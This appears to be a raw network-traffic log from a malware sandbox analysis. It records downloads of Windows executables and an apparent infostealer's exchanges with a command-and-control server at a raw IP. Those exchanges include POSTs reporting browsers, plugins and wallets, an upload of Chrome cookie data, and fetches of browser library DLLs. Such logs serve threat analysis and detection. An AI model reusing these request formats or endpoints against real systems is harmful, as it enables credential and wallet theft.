                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 03 Jul 2024 06:38:24 GMTContent-Type: application/octet-streamContent-Length: 1925632Last-Modified: Wed, 03 Jul 2024 05:30:46 GMTConnection: keep-aliveETag: "6684e206-1d6200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 10 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 4c 00 00 04 00 00 6e cb 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 f8 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 f7 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 69 71 76 67 63 6b 6d 00 50 1a 00 00 b0 31 00 00 4a 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6d 74 71 76 6a 71 61 00 10 00 00 00 00 4c 00 00 04 00 00 00 3c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 4c 00 00 22 00 00 00 40 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 03 Jul 2024 06:38:34 GMTContent-Type: application/octet-streamContent-Length: 2523648Last-Modified: Wed, 03 Jul 2024 04:16:16 GMTConnection: keep-aliveETag: "6684d090-268200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f6 41 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 c8 e8 be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 bf 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 e0 9c 00 77 0c 00 00 98 ec 9c 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 9c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 f0 78 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 50 22 00 00 b0 9c 00 00 4e 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECAHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 35 35 43 34 37 42 36 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 2d 2d 0d 0a Data Ascii: ------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="hwid"E8855C47B6BC4158135236------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="build"jony------JEHJKJEBGHJJKEBGIECA--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="message"browsers------HCGCBFHCFCFBFIEBGHJE--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCAHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 2d 2d 0d 0a Data Ascii: ------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="message"plugins------CAAAAFBKFIECAAKECGCA--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDBHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 2d 2d 0d 0a Data Ascii: ------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="message"fplugins------JJEGCBGIDHCAKEBGIIDB--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFHost: 85.28.47.4Content-Length: 6675Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJDHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3L
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJJKFHIJKKFHJJECBAHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 2d 2d 0d 0a Data Ascii: ------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="file"------IJKJJKFHIJKKFHJJECBA--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECAHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 2d 2d 0d 0a Data Ascii: ------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="file"------JEHJKJEBGHJJKEBGIECA--
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCAHost: 85.28.47.4Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKKKFIIJJKJKFIECBFHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4b 4b 46 49 49 4a 4a 4b 4a 4b 46 49 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4b 4b 46 49 49 4a 4a 4b 4a 4b 46 49 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4b 4b 46 49 49 4a 4a 4b 4a 4b 46 49 45 43 42 46 2d 2d 0d 0a Data Ascii: ------EHJKKKFIIJJKJKFIECBFContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------EHJKKKFIIJJKJKFIECBFContent-Disposition: form-data; name="message"wallets------EHJKKKFIIJJKJKFIECBF--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAEHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="message"files------CFBFHIEBKJKFHIEBFBAE--
